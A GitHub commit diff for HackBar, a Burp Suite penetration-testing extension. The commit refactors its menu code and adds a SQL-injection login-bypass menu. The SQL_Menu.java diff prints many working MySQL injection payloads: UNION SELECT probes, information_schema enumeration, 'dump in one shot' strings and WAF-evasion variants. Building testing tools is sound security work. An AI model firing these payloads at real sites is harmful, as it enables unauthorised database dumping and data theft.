Skip to content

Commit b97cf16

Browse files
rootroot
root
authored and
root
committed
added sqli login bypass
1 parent 25458f8 commit b97cf16

File tree

11 files changed

+164
-67
lines changed

11 files changed

+164
-67
lines changed

.gitignore

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,2 +1,3 @@
11
/build/
2-
/dist/
2+
/dist/
3+
/nbproject/private/

README.md

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -17,7 +17,7 @@
1717
- Burpsuite
1818
- Java
1919

20-
### Install Plugin
20+
### Download
2121

2222
Download Jar https://github.com/d3vilbug/HackBar/releases and add in burpsuite
2323

@@ -35,3 +35,6 @@
3535
- XXE
3636
- RCE
3737
- Mini Webshells
38+
39+
### Greet
40+
- An0n 3xPloiTeR https://github.com/Anon-Exploiter/ for SQLi && XSS payloads

build/built-jar.properties

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,4 @@
1-
#Wed, 05 Sep 2018 02:06:11 +0500
1+
#Fri, 07 Sep 2018 00:39:59 +0500
22

33

44
C\:\\Users\\bugzy\\Documents\\NetBeansProjects\\Burp_Plugins\\HackBar=

build/classes/burp/BurpExtender.class

52 Bytes
Binary file not shown.

build/classes/burp/MenuItemListener.class

-25.3 KB
Binary file not shown.

build/classes/burp/SQL_Menu.class

-690 Bytes
Binary file not shown.

nbproject/private/private.xml

Lines changed: 1 addition & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -3,10 +3,7 @@
33
<editor-bookmarks xmlns="http://www.netbeans.org/ns/editor-bookmarks/2" lastBookmarkId="0"/>
44
<open-files xmlns="http://www.netbeans.org/ns/projectui-open-files/2">
55
<group>
6-
<file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/Hack_Bar/src/burp/SQL_Menu.java</file>
7-
<file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/Hack_Bar/src/burp/BurpExtender.java</file>
8-
<file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/Hack_Bar/src/burp/RCE_Menu.java</file>
9-
<file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/Hack_Bar/src/burp/WebShell_Menu.java</file>
6+
<file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/SQL_Menu.java</file>
107
</group>
118
</open-files>
129
</project-private>

src/burp/BurpExtender.java

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -37,6 +37,7 @@ public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
3737
this.menu_list = new ArrayList();
3838
this.Hack_Bar_Menu = new JMenu(this.MenuName);
3939
this.Hack_Bar_Menu.add(new SQL_Menu(this));
40+
this.Hack_Bar_Menu.add(new SQli_LoginBypass(this));
4041
this.Hack_Bar_Menu.add(new XSS_Menu(this));
4142
this.Hack_Bar_Menu.add(new LFI_Menu(this));
4243
this.Hack_Bar_Menu.add(new XXE_Menu(this));

src/burp/Methods.java

Lines changed: 60 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
/*
2+
* To change this license header, choose License Headers in Project Properties.
3+
* To change this template file, choose Tools | Templates
4+
* and open the template in the editor.
5+
*/
6+
package burp;
7+
8+
import java.awt.event.ActionListener;
9+
import javax.swing.JMenu;
10+
import javax.swing.JMenuItem;
11+
import javax.swing.JOptionPane;
12+
import javax.swing.JSeparator;
13+
14+
/**
15+
*
16+
* @author abdul.wahab
17+
*/
18+
public class Methods {
19+
20+
public static JMenu add_MenuItem_and_listener(JMenu menu, String[] itemList, Object actionListener){
21+
for(int i = 0; i < itemList.length; i++){
22+
JMenuItem item = new JMenuItem(itemList[i]);
23+
item.addActionListener((ActionListener) actionListener);
24+
menu.add(item);
25+
}
26+
return menu;
27+
}
28+
29+
public static JMenu Create_Main_Menu(JMenu MainMenu, String[] MainMenuItems, String[][] SubMenuItems, Object actionListener){
30+
for(int i=0; i < MainMenuItems.length; i++){
31+
JMenu menu = new JMenu(MainMenuItems[i]);
32+
menu = add_MenuItem_and_listener(menu, SubMenuItems[i], actionListener);
33+
if(MainMenuItems[i].equals("Basic Statements")){
34+
MainMenu.add(new JSeparator());
35+
MainMenu.add(menu);
36+
MainMenu.add(new JSeparator());
37+
}else{
38+
MainMenu.add(menu);
39+
}
40+
}
41+
return MainMenu;
42+
}
43+
44+
public static String prompt_and_validate_input(String prompt, String str){
45+
String user_input = JOptionPane.showInputDialog(prompt, str);
46+
while(user_input.trim().equals("")){
47+
user_input = JOptionPane.showInputDialog(prompt, str);
48+
}
49+
return user_input.trim();
50+
}
51+
52+
public static byte[] do_modify_request(byte[] request, int[] selectedIndex, String modifiedString){
53+
byte[] modString = modifiedString.getBytes();
54+
byte[] newRequest = new byte[request.length + modifiedString.length() - (selectedIndex[1]-selectedIndex[0])];
55+
System.arraycopy(request, 0, newRequest, 0, selectedIndex[0]);
56+
System.arraycopy(modString, 0, newRequest, selectedIndex[0], modString.length);
57+
System.arraycopy(request, selectedIndex[1], newRequest, selectedIndex[0]+modString.length, request.length-selectedIndex[1]);
58+
return newRequest;
59+
}
60+
}

src/burp/SQL_Menu.java

Lines changed: 23 additions & 60 deletions
Original file line numberDiff line numberDiff line change
@@ -46,35 +46,15 @@ public class SQL_Menu extends JMenu{
4646
this.Create_SQL_Menu();
4747
}
4848

49-
public JMenu add_MenuItem_and_listener(JMenu menu, String[] itemList){
50-
for(int i = 0; i < itemList.length; i++){
51-
JMenuItem item = new JMenuItem(itemList[i]);
52-
item.addActionListener(new MenuItemListener(myburp));
53-
menu.add(item);
54-
}
55-
return menu;
56-
}
57-
5849
public void Create_SQL_Menu(){
59-
for(int i=0; i < SQL_MenuItem.length; i++){
60-
JMenu menu = new JMenu(SQL_MenuItem[i]);
61-
menu = add_MenuItem_and_listener(menu, SQL_MenuItems[i]);
62-
if(SQL_MenuItem[i].equals("Basic Statements")){
63-
this.add(new JSeparator());
64-
this.add(menu);
65-
this.add(new JSeparator());
66-
}else{
67-
this.add(menu);
68-
}
69-
70-
}
50+
Methods.Create_Main_Menu(this, SQL_MenuItem, SQL_MenuItems, new SQLMenuItemListener(myburp));
7151
}
7252
}
7353

74-
class MenuItemListener implements ActionListener {
54+
class SQLMenuItemListener implements ActionListener {
7555

7656
BurpExtender myburp;
77-
MenuItemListener(BurpExtender burp) {
57+
SQLMenuItemListener(BurpExtender burp) {
7858
myburp = burp;
7959
}
8060

@@ -91,23 +71,6 @@ public void actionPerformed(ActionEvent e) {
9171
req.setRequest(newRequest);
9272
}
9373

94-
public byte[] do_modify_request(byte[] request, int[] selectedIndex, String modifiedString){
95-
byte[] modString = modifiedString.getBytes();
96-
byte[] newRequest = new byte[request.length + modifiedString.length() - (selectedIndex[1]-selectedIndex[0])];
97-
System.arraycopy(request, 0, newRequest, 0, selectedIndex[0]);
98-
System.arraycopy(modString, 0, newRequest, selectedIndex[0], modString.length);
99-
System.arraycopy(request, selectedIndex[1], newRequest, selectedIndex[0]+modString.length, request.length-selectedIndex[1]);
100-
return newRequest;
101-
}
102-
103-
public String prompt_and_validate_input(String prompt, String str){
104-
String user_input = JOptionPane.showInputDialog(prompt, str);
105-
while(user_input.trim().equals("")){
106-
user_input = JOptionPane.showInputDialog(prompt, str);
107-
}
108-
return user_input.trim();
109-
}
110-
11174
public String creat_number_list(int count, String str, String str2){
11275
String col = "+";
11376
String tmp = ",";
@@ -130,39 +93,39 @@ public byte[] do_sql_op(byte[] request, String selectedString, String action, in
13093
String tmp = null;
13194
switch(action){
13295
case "Order By":
133-
columns = prompt_and_validate_input("Enter No. of Columns", null);
96+
columns = Methods.prompt_and_validate_input("Enter No. of Columns", null);
13497
selectedString = "+Order+By+" + columns + "+";
13598
break;
13699
case "Group By":
137-
columns = prompt_and_validate_input("Enter No of Columns", null);
100+
columns = Methods.prompt_and_validate_input("Enter No of Columns", null);
138101
tmp = creat_number_list(Integer.valueOf(columns), null, null);
139102
selectedString = "+GROUP+BY" + tmp + "+";
140103
break;
141104
case "Procedure Analyse":
142105
selectedString = "+PROCEDURE+ANALYSE()+";
143106
break;
144107
case "Union Select":
145-
columns = prompt_and_validate_input("Enter No. of Columns", null);
108+
columns = Methods.prompt_and_validate_input("Enter No. of Columns", null);
146109
tmp = creat_number_list(Integer.valueOf(columns), null, null);
147110
selectedString = "+Union+Select" + tmp + "+";
148111
break;
149112
case "Union All Select (int)":
150-
columns = prompt_and_validate_input("Enter No. of Columns", null);
113+
columns = Methods.prompt_and_validate_input("Enter No. of Columns", null);
151114
tmp = creat_number_list(Integer.valueOf(columns), null, null);
152115
selectedString = "+Union+ALL+Select" + tmp + "+";
153116
break;
154117
case "Union All Select(null)":
155-
columns = prompt_and_validate_input("Enter No. of Columns", null);
118+
columns = Methods.prompt_and_validate_input("Enter No. of Columns", null);
156119
tmp = creat_number_list(Integer.valueOf(columns), "NULL", null);
157120
selectedString = "+Union+ALL+Select" + tmp + "+";
158121
break;
159122
case "(INT),(INT)":
160-
columns = prompt_and_validate_input("Enter No. of Columns", null);
123+
columns = Methods.prompt_and_validate_input("Enter No. of Columns", null);
161124
tmp = creat_number_list(Integer.valueOf(columns), null, "()");
162125
selectedString = "+Union(Select" + tmp + ")+";
163126
break;
164127
case "(NULL),(NULL)":
165-
columns = prompt_and_validate_input("Enter No. of Columns", null);
128+
columns = Methods.prompt_and_validate_input("Enter No. of Columns", null);
166129
tmp = creat_number_list(Integer.valueOf(columns), "NULL", "()");
167130
selectedString = "+Union(Select" + tmp + ")+";
168131
break;
@@ -185,42 +148,42 @@ public byte[] do_sql_op(byte[] request, String selectedString, String action, in
185148
selectedString = "(SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x)";
186149
break;
187150
case "Table Group Concat":
188-
database = prompt_and_validate_input("Enter Database Name", "DATABASE()");
151+
database = Methods.prompt_and_validate_input("Enter Database Name", "DATABASE()");
189152
database = "0x" + String.format("%x", new BigInteger(1, database.getBytes()));
190153
selectedString = "(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=" + database + ")";
191154
break;
192155
case "Table One Shot":
193156
selectedString = "(SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x)";
194157
break;
195158
case "Column Group Concat":
196-
table = prompt_and_validate_input("Enter Table Name", null);
159+
table = Methods.prompt_and_validate_input("Enter Table Name", null);
197160
table = "0x" + String.format("%x", new BigInteger(1, table.getBytes()));
198161
selectedString = "(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=" + table + ")";
199162
break;
200163
case "Column One Shot":
201-
table = prompt_and_validate_input("Enter Table Name", null);
164+
table = Methods.prompt_and_validate_input("Enter Table Name", null);
202165
table = "0x" + String.format("%x", new BigInteger(1, table.getBytes()));
203166
selectedString = "(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=" + table + ")AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,column_name,0x3c62723e)))))x)";
204167
break;
205168
case "Data Group Concat":
206-
database = prompt_and_validate_input("Enter Database Name", "DATABASE()");
207-
table = prompt_and_validate_input("Enter Table Name", null);
208-
columns = prompt_and_validate_input("Enter Column to dump", null).replace(' ', '+');
169+
database = Methods.prompt_and_validate_input("Enter Database Name", "DATABASE()");
170+
table = Methods.prompt_and_validate_input("Enter Table Name", null);
171+
columns = Methods.prompt_and_validate_input("Enter Column to dump", null).replace(' ', '+');
209172
if (!database.toLowerCase().equals("database()")){ table = database+"."+table;}
210173
selectedString = "(SELECT+GROUP_CONCAT(" + columns + "+SEPARATOR+0x3c62723e)+FROM+" + table + ")";
211174
break;
212175
case "Data One Shot":
213-
database = prompt_and_validate_input("Enter Database Name", "DATABASE()");
214-
table = prompt_and_validate_input("Enter Table Name", null);
215-
columns = prompt_and_validate_input("Enter Column to dump", null).replace(' ', '+');
176+
database = Methods.prompt_and_validate_input("Enter Database Name", "DATABASE()");
177+
table = Methods.prompt_and_validate_input("Enter Table Name", null);
178+
columns = Methods.prompt_and_validate_input("Enter Column to dump", null).replace(' ', '+');
216179
if (!database.toLowerCase().equals("database()")){ table = database+"."+table;}
217180
selectedString = "(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(" + table + ")WHERE(@x)IN(@x:=CONCAT(0x20,@x," + columns + ",0x3c62723e))))x)";
218181
break;
219182
case "DIOS by makman":
220183
selectedString = "+concat(0x3c64697620616c69676e3d226c65667422207374796c653d22666f6e742d66616d696c793a20436f6d69632053616e73204d53223e3c68313e44494f53204279206d616b6d616e3c2f68313e,user(),0x3c62723e,version(),@x:='',@y:='',@schname:='',@tbl:='',0x0a,if(benchmark((select+count(*)from+information_schema.schemata+where+schema_name!='information_schema'),@x:=concat(@x,0x0a0a,@y:='',(select+concat(0x3c68723e,repeat(0x2d,length(schema_name)),0x3c62723e,@schname:=schema_name,0x3c62723e,repeat(0x2d,length(schema_name)),if((select+count(*)from+information_schema.columns+where+table_schema=schema_name+and+@y:=concat(@y,0x0a,if(@tbl!=table_name,concat(0x3c62723e2d2d3e20,@tbl:=table_name,0x3a3a,(select+table_rows+from+information_schema.tables+where+table_schema=schema_name+and+table_name=@tbl+limit+1)),concat(0x2a,column_name)))),'',''),@y)from+information_schema.schemata+where+schema_name!='information_schema'+and+schema_name+>+@schname+order+by+schema_name+ASC+limit+1))),'',''),0x0a,@x)+as+makman+";
221184
break;
222185
case "DIOS by makman v2":
223-
database = prompt_and_validate_input("Enter Database Name", "DATABASE()");
186+
database = Methods.prompt_and_validate_input("Enter Database Name", "DATABASE()");
224187
if (!database.toLowerCase().equals("database()")){ database = "0x" + String.format("%x", new BigInteger(1, database.getBytes()));}
225188
selectedString = "(select(@x)from(select(@x:=0x00),(@nr:=0),(@tbl:=0x0),(select(0)from(information_schema.tables)where(table_schema=" + database + ")and(0x00)in(@x:=concat_ws(0x20,@x,lpad(@nr:=@nr%2b1,3,0x0b),0x2e20,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e203a3a3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e20207b2020436f6c756d6e73203a3a205b3c666f6e7420636f6c6f723d7265643e,(select+count(*)+from+information_schema.columns+where+table_name=@tbl),0x3c2f666f6e743e5d20207d3c2f666f6e743e,0x3c62723e))))x)";
226189
break;
@@ -249,12 +212,12 @@ public byte[] do_sql_op(byte[] request, String selectedString, String action, in
249212
selectedString = "(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)";
250213
break;
251214
case "DIOS by Ajkaro":
252-
database = prompt_and_validate_input("Enter Database Name", "DATABASE()");
215+
database = Methods.prompt_and_validate_input("Enter Database Name", "DATABASE()");
253216
if (!database.toLowerCase().equals("database()")){ database = "0x" + String.format("%x", new BigInteger(1, database.getBytes()));}
254217
selectedString = "(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=" + database + ")and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)";
255218
break;
256219
case "DIOS by AkDK":
257-
database = prompt_and_validate_input("Enter Database Name", "DATABASE()");
220+
database = Methods.prompt_and_validate_input("Enter Database Name", "DATABASE()");
258221
if (!database.toLowerCase().equals("database()")){ database = "0x" + String.format("%x", new BigInteger(1, database.getBytes()));}
259222
selectedString = "concat/***/(0x223e3c2f7461626c653e3c2f6469763e3c2f613e3c666f6e7420636f6c6f723d677265656e3e3c62723e3c62723e3c62723e,0x3c666f6e7420666163653d63616d62726961207374796c653d726567756c61722073697a653d3320636f6c6f723d7265643e7e7e7e7e7e3a3a3a3a3a496e6a6563746564206279416c69204b68616e3a3a3a3a3a7e7e7e7e7e3c62723e3c666f6e7420636f6c6f723d626c75653e2056657273696f6e203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,version(),0x3c62723e3c666f6e7420636f6c6f723d626c75653e204461746162617365203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,database(),0x3c62723e3c666f6e7420636f6c6f723d626c75653e2055736572203a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,user(),0x3c62723e3c666f6e7420636f6c6f723d7265643e205461626c657320203c2f666f6e743e203a3a3a3a3a3a3a3a3a3a3a3a203c666f6e7420636f6c6f723d677265656e3e436f6c756d6e733c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e,@:=0,%28Select+count(*)from%28information_Schema.columns)where(table_schema=" + database + ")and@:=concat/**/(@,0x3c6c693e,0x3c666f6e7420636f6c6f723d7265643e,table_name,0x3c2f666f6e743e203a3a3a3a3a3a3a3a3a3a3a2020203c666f6e7420636f6c6f723d677265656e3e,column_name,0x3c2f666f6e743e)),@,0x3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e3c62723e)";
260223
break;
@@ -295,6 +258,6 @@ public byte[] do_sql_op(byte[] request, String selectedString, String action, in
295258
selectedString = selectedString;
296259

297260
}
298-
return do_modify_request(request, selectedIndex, selectedString);
261+
return Methods.do_modify_request(request, selectedIndex, selectedString);
299262
}
300263
}

0 commit comments

Comments
 (0)